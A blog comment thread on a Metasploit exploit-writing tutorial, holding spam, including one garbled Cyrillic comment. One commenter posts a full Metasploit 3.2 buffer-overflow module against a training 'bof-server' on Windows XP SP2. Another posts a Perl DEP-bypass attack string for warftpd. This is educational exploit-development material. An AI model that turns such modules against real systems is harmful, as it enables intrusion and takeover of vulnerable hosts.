Comments on: Writing exploits for Metasploit 3.0

By: brimejoslyn

brimejoslyn — Sun, 11 Dec 2011 13:41:24 +0000

you definitely love for gift online shopping

By: whalaymar

whalaymar — Sun, 11 Dec 2011 08:42:43 +0000

СЂС‹Р±РѕР»РѕРІРЅС‹Рµ РїСѓС‚РµС€РµСЃС‚РІРёСЏ РїСѓС‚РµС€РµСЃС‚РІРёСЏ РІ РїР°СЂРёР¶ РїСѓС‚РµС€РµСЃС‚РІРёСЏ РїРѕ РєРёРїСЂСѓ РїСѓС‚РµС€РµСЃС‚РІРёСЏ С„РѕС‚РѕРіСЂР°С„РёРё РїСѓС‚РµС€РµСЃС‚РІРёСЏ СЂРѕСЃСЃРёСЏ РїСѓС‚РµС€РµСЃС‚РІРёСЏ РіРµСЂРјР°РЅРёСЏ

By: mafri

mafri — Sun, 09 Oct 2011 03:33:28 +0000

MAFRI…

[...]redstack » Blog Archive » Writing exploits for Metasploit 3.0[...]…

By: xipe

xipe — Sat, 26 Jun 2010 12:44:51 +0000

Hi anony,

I tried the exploit (the one you can get in my comment of Sept. 29th 2009) with 3.2 and the latest trunk version (3.4.1-dev r9628) and it seems to work.

Can you post or mail me your code and I will check ?

Best regards,
- Xipe

By: anony

anony — Sat, 26 Jun 2010 04:23:43 +0000

Like the tutorial however I’m having some issues reversing your final product written for 3.2
The metasploit 3.2 version you posted in the comments works just fine but i would like to go through the tutorial still. Because your 3.2 version is the final product i must make some changes so that it can be used in step one of your tutorial. When i do this I keep getting errors such as “undefined method ‘length’”. Have any time for a 3.2 rewrite?

Thanks, hope to see another how-to along these lines.

By: matad0r

matad0r — Sun, 10 Jan 2010 17:13:30 +0000

Hi !
Very very helpful tutorial !
Thanks !

By: xipe

xipe — Tue, 29 Sep 2009 17:23:02 +0000

Hi Elv13,

With metasploit 3.2, some things change concerning the class definition.
You should replace :

require 'msf/core'
module Msf
  # class name should reflect directories
  class Exploits::Windows::Dummy::BofServer < Msf::Exploit::Remote
    include Exploit::Remote::Tcp

with :

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
        include Msf::Exploit::Remote::Tcp

So the new file would be:

require 'msf/core'
  # class name should reflect directories                                                                                                                                                                                                                                              
  class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::Remote::Tcp
 
    # exploit relative informations
    def initialize(info = {})
      super(update_info(info,
                        'Name'           => 'bof-server exploit',
                        'Description'    => 'This is an exploit for bof-server v0.01',
                        'Author'         => 'xipe', # You ;)
                        'Version'        => '1.0',
                        'Payload'        =>
                        {
                          'Space'    => 500, # Space that payload can use.
                                             # We found that we needed 520 bytes to make the
                                             # bof-server crash, but we will only use 500, as
                                             # the end of this space can be modified by the target
                                             # before returning.
                          'StackAdjustment' => -3500, # Modify stack pointer at shellcode start
                                                      # so it can use the stack without writing
                                                      # on itself.
                          'BadChars' => "\x00\x20\x0D\x0A", # Chars that payloads should not
                                                            # contains.
                        },
                        'Platform'   => 'win',
                        'Targets'    =>
                        [
                         [ 'Windows XP SP2 English',
                             {
                               'Platform' =>'win',
                               'Ret' => 0x22fb65 # Return address.                                                                                                                                                                                                                     
                             }
                          ],
                        ],
                        'DefaultTarget' => 0))
    end
 
    def check
      # Here we should check if the target is vulnerable                                                                                                                                                                                                                               
      # This function should not crash the target                                                                                                                                                                                                                                      
      connect
      buf = "version\n"
      sock.put(buf)
      res = sock.get
      disconnect
      if res =~ /bof-server v0.01/
        return Exploit::CheckCode::Vulnerable
      end
      return Exploit::CheckCode::Safe
    end
 
    def exploit
      # Here we should exploit the target 
      connect
      buf = payload.encoded # Size of the payload is defined by Payload.Space in exploit infos.
      buf << make_nops(20) # Some more bytes, as we defined the payload to be 500 bytes long
      buf << [target.ret].pack('V') # Return address
      sock.put(buf) # send data
      sock.get
      handler # pass the connection to the payload handler
      disconnect
    end
end

Best regards,
- Xipe

By: Elv13

Elv13 — Tue, 29 Sep 2009 15:48:12 +0000

Hi, I try to use this exploit, but always fail with this error:
/opt/metasploit/framework-3.2/modules/exploits/linux/dummy/bof-server.rb: NameError /opt/metasploit/framework-3.2/data/msfweb/vendor/rails/activerecord/lib/../../activesupport/lib/active_support/dependencies.rb:116:in `qualified_const_defined?’: “#::Msf” is not a valid constant name!

I use metasploit from Linux and ported your C code to Linux without much trouble. It seem to work (server crash normally), but I am not able to launch the exploit. I also installed bufserver on windows and try to hack it from Linux, but I fail too. Whats wrong?

By: abhijit mohanta

abhijit mohanta — Tue, 11 Aug 2009 09:14:27 +0000

Hi,

I have one confusion in adding a exploit module to metasploit. that would exploit warftpd on xp sp2 bypass dep.

my $evil = “\xcc” x 485;
$evil .= “\x80\x20\x95\x7c”;
$evil .= “\xff\xff\xff\xff”;
$evil .= “\xf8\xd3\x91\x7c”;
$evil .= “\xff\xff\xff\xff”;
$evil .= “\xcc” x 0×54;
$evil .= pack(“V”, $target->[1]);
$evil .= $shellcode;
$evil .= “\xcc” x (1024 – length($evil));

above is attack vector for DEP bypass acc to skape skywing paper “Bypassing Windows Hardware-enforced Data Execution Prevention”.It is for the metasploit 2.7 that war in perl.

Can u please tell me how to code this in ruby.I have tried it but was not sucessful.

Abhijit

By: Bilal

Bilal — Wed, 05 Aug 2009 01:56:27 +0000

You are a star, you have impressed me and helped me a lot but writing this article. I am doing my project on buffer overflow attack and i have found this article very helpful

Thanks
Bilal